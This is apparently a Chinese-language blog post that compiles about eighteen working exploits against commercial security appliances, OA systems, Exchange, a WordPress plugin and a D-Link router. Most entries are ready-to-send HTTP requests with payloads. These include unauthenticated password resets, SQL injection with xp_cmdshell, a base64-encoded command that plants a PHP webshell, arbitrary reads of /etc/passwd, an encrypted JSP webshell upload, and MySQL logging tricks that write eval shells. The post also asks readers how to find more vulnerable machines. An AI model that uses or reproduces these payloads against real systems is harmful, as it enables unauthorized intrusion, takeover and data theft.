1、天融信数据防泄漏系统越权修改管理员密码
无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd
接口未授权访问,造成直接修改任意用户密码。:默认superman账户uid为1。
POST /?module=auth_user&action=mod_edit_pwd Cookie: username=superman; uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
2、绿盟UTS综合威胁探针管理员任意登录
对响应包进行修改,将false更改为true的时候可以泄露管理用户的md5值密码
利用渠道的md5值去登录页面
3、天融信TopApp-LB 负载均衡系统sql注入
POST /acc/clsf/report/datasource.php HTTP/1.1 Host: Connection: close Accept: text/javascript, text/html, application/xml, text/xml, / X-Prototype-Version: 1.6.0.3 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57 Content-Type: application/x-www-form-urlencoded Content-Length: 201 t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr(‘a’,1,1),11,12,13,14,15,16,17,18,19,20,21,22—+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。
4、用友GRP-u8 注入
POST /Proxy HTTP/1.1 Accept: Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: host Content-Length: 357 Connection: Keep-Alive Cache-Control: no-cache cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
5、宝塔Nginx解析漏洞
本地写一个
<?php phpinfo(); ?>
另存为.jpg格式
直接上传文件,不需要做任何修改:
访问上传文件地址:
在upload/1.jpg 后面加/.php
6、深信服EDR漏洞RCE
绕过:{“params”:”w=123\”‘1234123’\”|命令”}
结果如下:
返回:
7、齐治堡垒机前台远程命令执行漏洞
齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835)
未授权无需登录。
1、访问 http://10.20.10.11/listener/cluster_manage.php :返回 “OK”.
2、访问如下链接即可getshell,执行成功后,生成PHP一句话马
3、/var/www/shterm/resources/qrcode/lbj77.php 密码10086
https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}
8、泛微OA云桥任意文件读取
未授权任意文件读取,
GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 User-Agent: curl/7.29.0 Host: xxxxx Accept: */*
9、宝塔面板phpMyadmin未授权访问
前段时间在朋友圈和微信群里火热不行的宝塔数据库面板未授权无需登录,以下是存在安全问题的版本。
1、宝塔默认phpMyadmin端口就是888 而这个漏洞排查方式极其简单 172.10.0.121:888/pma
2、如果宝塔是存在安全问题的版本,那就会直接出现phpMyadmin面板页面。
10、Exchange Server 远程代码执行漏洞
微软公告说的很明显,只需要一个Exchange用户账号。就能在Exchange服务器上执行任意命令。
https://srcincite.io/pocs/cve-2020-16875.py.txt
https://srcincite.io/pocs/cve-2020-16875.ps1.txt
researcher@incite:~$ ./poc.py (+) usage: ./poc.py <target> <user:pass> <cmd> (+) eg: ./poc.py 192.168.75.142 harrym@exchangedemo.com:user123### mspaint researcher@incite:~$ ./poc.py 192.168.75.142 harrym@exchangedemo.com:user123### mspaint (+) logged in as harrym@exchangedemo.com (+) found the __viewstate: /wEPDwUILTg5MDAzMDFkZFAeyPS7/eBJ4lPNRNPBjm8QiWLWnirQ1vsGlSyjVxa5 (+) triggered rce as SYSTEM!
11、PhpStudy nginx解析漏洞
1、利用条件就只需要把php恶意文件上传(oss不算!)到服务器。
<?php phpinfo();?>
2、通过 /x.txt/x.php 方式访问上传的图片地址,啪嚓! 就解析了php代码。
12、深信服EDR后台任意用户登陆漏洞
Payload
/ui/login.php?user=username
输入上面的Payload只要这样一下,成功绕过
https://127.0.0.1:9443/ui/login.php?user=username
成功绕过登录后台
13、深信服EDR远程命令执行漏洞CNVD-2020-46552
攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以在目标主机上执行任意命令。国家信息安全漏洞共享平台(CNVD)已于8月18日收录该漏洞。CNVD对该漏洞的综合评级为“高危,漏洞影响版本v3.2.16-19”。
1)构造Payload,这里漏洞文件是c.php,漏洞参数是host
/tool/log/c.php?strip_slashes=system&host=id2) root权限
14、WordPress插件WP File Manager的0day漏洞
访问这个文件 /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
显示是json
第一步先Get请求如下
https://www.xxx.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=mkfile&name=1.php&target=l1_Lw
第二步post下面的包到这个地址
https://www.xxx.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
post内容:
cmd=put&target=l1_MS5waHA%3D&content=马内容
即可在此目录可生成马
https://www.xxx.com/wp-content/plugins/wp-file-manager/lib/files/1.php 网上实际能打的机器太少,希望大家能给出一些更好的语法能直接找到这类机器#
15、D-Link dir645 Service.Cgi远程命令执行
POST /service.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Referer: http://192.168.0.1/ Content-Length: 17 Cookie: uid=NDRCRN78JY EVENT=pwd%3bls%26
16、联软科技产品存在任意文件上传和命令执行漏洞
POST /uai/download/uploadfileToPath.htm HTTP/1.1 HOST: xxxxx -----------------------------570xxxxxxxxx6025274xxxxxxxx1 Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp" Content-Type: image/png <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> -----------------------------570xxxxxxxxx6025274xxxxxxxx1 Content-Disposition: form-data; name="uploadpath" ../webapps/notifymsg/devreport/ -----------------------------570xxxxxxxxx6025274xxxxxxxx1--
17、通达OA v11.7后台SQL注入到RCE
添加用户:
grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION
然后该用户是对mysql数据库拥有所有权限的,然后给自己加权限:
UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('at666' AS Binary(5));
然后用注入点刷新权限,因为该用户是没有刷新权限的权限的: general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;
提示这个,或者让改密码死活改不了。再执行一下
grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION 查路径 select @@basedir; # c:\td0a117\mysql5\,那么web目录就是c:\td0a117\webroot\ 方法1: set global slow_query_log=on; set global slow_query_log_file='C:/td0a117/webroot/tony.php'; select '<?php eval($_POST[x]);?>' or sleep(11); 方法2: set global general_log = on; set global general_log_file = 'C:/td0a117/webroot/tony2.php'; select '<?php eval($_POST[x]);?>'; show variables like '%general%';
18、泛微云桥另一处任意文件读取与写入漏洞
演示效果如下:
文章评论